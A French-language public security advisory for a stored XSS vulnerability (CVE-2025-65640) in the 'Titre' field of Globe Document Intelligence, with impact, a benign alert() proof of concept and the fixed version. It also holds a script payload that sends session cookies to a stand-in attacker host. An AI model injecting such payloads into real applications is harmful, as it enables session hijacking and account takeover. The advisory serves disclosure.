
Avis public pour CVE-2025-65640 : vulnérabilité XSS stockée dans Globe Document Intelligence.
Une vulnérabilité de Cross-Site Scripting stocké (XSS) a été identifiée dans la plateforme Globe Document Intelligence (version 5.0.0.559). L'application ne parvient pas à assainir ou encoder correctement les entrées fournies par l'utilisateur dans la propriété « Titre » d'un document nouvellement créé. Lorsqu'un utilisateur authentifié accède aux pages de résumé (par exemple, « Tâche en cours / Récent »), la charge utile malveillante est reflétée et exécutée dans le contexte du navigateur de la victime.
Cette vulnérabilité permet à un attaquant authentifié de stocker du code JavaScript malveillant sur le serveur.
Lorsque d'autres utilisateurs authentifiés (y compris les comptes administratifs) consultent les pages concernées, le script s'exécute automatiquement.
Bien que la preuve de concept ci-dessous démontre la vulnérabilité en utilisant un alert() bénin, un attaquant peut exploiter cette faille pour réaliser un détournement de session et une prise de contrôle de compte.
Par exemple, l'injection d'une charge utile telle que exfiltrerait silencieusement les cookies de session de la victime vers un serveur externe contrôlé par l'attaquant.
<script>fetch('https://attacker.com/?cookie='+encodeURIComponent(document.cookie))</script>Pour reproduire la vulnérabilité, un attaquant authentifié peut suivre ces étapes :
<script>alert("XSS")</script>Selon le fournisseur, cette vulnérabilité a été corrigée dans la version 5.1.0.575. Pour remédier à ce problème, il est recommandé de mettre à jour la plateforme Globe Document Intelligence vers la version 5.1.0.575.
Cette preuve de concept (PoC) est fournie exclusivement à des fins éducatives et de recherche. Les informations et le code décrits dans ce document ne doivent pas être utilisés pour des activités malveillantes ou contre des systèmes sans autorisation explicite et préalable des propriétaires du système. L'auteur décline toute responsabilité et n'est pas responsable de tout abus ou dommage causé par l'application du matériel fourni.